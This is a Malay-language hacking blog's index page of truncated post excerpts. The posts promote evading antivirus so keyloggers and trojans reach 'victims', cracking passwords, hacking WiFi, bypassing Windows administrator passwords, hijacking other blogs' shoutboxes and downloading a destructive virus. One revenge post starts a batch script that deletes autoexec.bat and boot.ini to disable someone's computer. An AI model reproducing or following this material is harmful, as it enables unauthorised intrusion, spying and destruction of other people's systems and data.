Uncategorized

Bagaimana Untuk Bypass Antivirus Detection Terhadap Keylogger atau Trojan

Crypter jenis ini ialah UD iaitu undetectable dan bukan FUD (Fully undetectable) kerana ia masih terdeteksi sebagai virus oleh Avira dan Kaspersky. Jadi, kalau mangsa korang pakai antivirus selain dua ni, korang boleh melompat kegirangan la ek..heheheh.. UD Crypter digunakan untuk mengelakkan pengesanan antivirus pada komputer mangsa. Jadi, kita menggunakan software UD Crypter untuk membuat […]

Uncategorized

Advance Archive Password Recovery

Entry kali ni pun aku buat untuk eszol sebab dia request kat aku tadi.. disebabkan aku malas nak tulis, so aku bagi aje la video ni, dengan link untuk korang muat turun perisian tersebut..enjoy! Nota: Bagi sesiapa yang nak request apa-apa sahaja artikel atau perisian, sila berbuat demikian di shoutbox blog ini..terima kasih.. Advance Archive […]

Uncategorized

Crack Password Microsoft Word

Entry kali ni plak aku bagi dekat Eszol a.k.a raar aku ni dah malas nak tulis hari ni..so…korang tengok aje la video kat bawah ni ok.. Pecahkan kata laluan! – Untuk dapatkan tips-tips hacking, klik di sini Arya PutraA regular tech blogger who have passions for cats. I will not put my trust on anybody […]

Uncategorized

Mengembalikan Data/Fail Yang Telah Di Delete

Adakah korang secara tidak sengaja memadam fail dari Hard disk? Adakah korang sangat ingin memulihkan fail tersebut kembali? korang tidak perlu panik! Adalah tidak mustahil untuk memulihkan kembali fail dihapuskan dari hard disk (bahkan selepas korang tekan Shift + Delete) asalkan bertindak segera selepas korang menyedari bahawa fail tersebut dihapuskan dan gunakan perisian terbaik untuk […]

Uncategorized

Hacking WiFi!

Yeah..entry kali ni aku taip khas untuk Melvister (Klik di sini) sebab dia yang request entry ni.. ada yang request untuk hack akaun nuffnang orang (encik tuuut..jangan marah ye), tapi aku bimbang blog ni jadi bahan makian dan cacian mereka-mereka yang akaun nuffnangnya dah cecah juta-juta..muahaha! aku rasa korang yang nak buat benda-benda camtu, aku […]

Uncategorized

Mematikan (Shutdown) Komputer Untuk Selama-lamanya!

Aku yakin korang ingin membalas ke atas perbuatan buruk yang pernah korang terkena sebelum ni pada seseorang,dan dengan sedikit kaedah korang dapat mematikan komputer orang tersebut selamanya! Mari kita mulakan: Buka notepad dan copy / paste kod ini: @ Echo off attrib-r-s-h c: autoexec.bat del c: autoexec.bat attrib-r-s-h c: boot.ini del c: boot.ini attrib-r-s-h c: […]

Uncategorized

Hack Windows Administrator Password

Kaedah hack kali ini aku akan menunjukkan cara untuk menetapkan semula password administrator Windows (untuk Win 2000, XP, Vista dan Win 7) pada saat korang lupa atau apabila korang ingin mendapatkan akses kepada komputer yang korang tidak tahu password. sebelum ni aku dah pernah buat posting tentang benda yang sama jugak tapi kaedah sahaja yang […]

Uncategorized

Hack Shoutbox (Shoutmix, C-Box) & Jadi Admin?

Salam semua…hahaha…hari ni aku nak cerita sikit pasal shoutbox ni..bukan apa, ada beberapa hari yang lepas, aku ada tinggalkan mesej berbunyi lebih kurang macam ni: “This shoutbox was hacked by MyHackersAreHere!” dengan menjadikan nama aku sebagai ‘Admin’ di blog tersebut… antara yang pernah kena ialah blog Kak Pah (Klik di sini), Pendekar Berkuda (Klik di […]

Uncategorized

Ghost Virus

Hari ni terasa malas sikit nak tulis panjang-panjang lebar.. jadi hari ni aku cuma bagi korang semua link untuk muat turun VIRUS yang sangat dahsyat kesannya kepada komputer..antara ‘kedahsyatan’ perbuatan virus ini ialah: * Disable Task Manager * Disable Registry Editor * Disable MS Config * Disable Command Prompt * Disable Explorer * Disable Shutdown […]